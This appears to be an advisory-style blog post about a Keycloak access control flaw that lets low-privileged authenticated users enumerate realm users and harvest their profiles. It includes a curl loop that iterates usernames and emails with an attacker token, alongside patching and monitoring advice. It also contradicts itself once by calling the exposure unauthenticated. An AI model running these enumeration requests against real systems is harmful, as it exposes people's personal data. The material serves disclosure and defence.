Listen to this Post
A flawed access control in Keycloak’s Account Resources user lookup endpoint allows an authenticated attacker who owns at least one User-Managed Access (UMA) resource to enumerate and leak personal data for all users in a realm. The issue stems from insufficient granularity of access control (CWE‑1220): when a request containing an arbitrary username or email is sent to the endpoint, the system fails to verify whether the authenticated requester actually has permission to access the target user’s profile. Instead of rejecting the lookup, the endpoint returns the full profile object of any matching user, including identifiers, names, email addresses, and other personally identifiable information (PII). This broken access control can be exploited remotely over the network without special conditions, requiring only low‑level privileges (the attacker must be authenticated and have created one UMA resource). The vulnerability affects the core authorization logic of Keycloak, undermining the principle of least privilege and enabling large‑scale user enumeration and privacy violations.
DailyCVE Form:
Platform: Keycloak (RedHat)
Version: before 26.6.2
Vulnerability: Broken Access Control
Severity: Medium (CVSS 4.3)
date: 2026-05-19
Prediction: 2026-06-10
What Undercode Say:
Enumerate all realm users by username for username in user1 user2 admin; do curl -X GET "https://keycloak.example.com/auth/realms/demo/account/user?username=$username" \ -H "Authorization: Bearer $ATTACKER_TOKEN" done Harvest full profiles via email curl -X GET "https://keycloak.example.com/auth/realms/demo/account/[email protected]" \ -H "Authorization: Bearer $ATTACKER_TOKEN"
Exploit:
An attacker with a valid session and at least one UMA resource sends crafted GET requests to the vulnerable endpoint, substituting different usernames or email addresses. The endpoint returns the full profile object for each valid user, even though the attacker has no relationship with those users. By iterating over common usernames or email patterns, the attacker can systematically enumerate all realm users and harvest their PII.
Protection:
- Upgrade Keycloak to version 26.6.2 or later (or the back‑ported fix 26.4.12).
- If patching is not immediately possible, restrict or remove unnecessary UMA resources to limit the attack surface.
- Implement strict access control checks that require explicit permission for each user lookup.
- Add rate‑limiting and anomaly detection for repeated user‑lookup attempts.
- Monitor logs for suspicious patterns (e.g., large numbers of user enumeration requests from a single authenticated session).
Impact:
- Information Disclosure: Full names, email addresses, and other profile attributes of every user in the realm are exposed.
- Privacy Violations: Leaked PII can be used for identity theft, targeted phishing, credential stuffing, and social engineering.
- Compliance Risks: Organizations may violate GDPR, CCPA, or other data‑protection regulations due to unauthenticated data access.
- Reputational Damage: Trust in the authentication system is severely eroded, potentially leading to loss of user confidence and legal liabilities.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
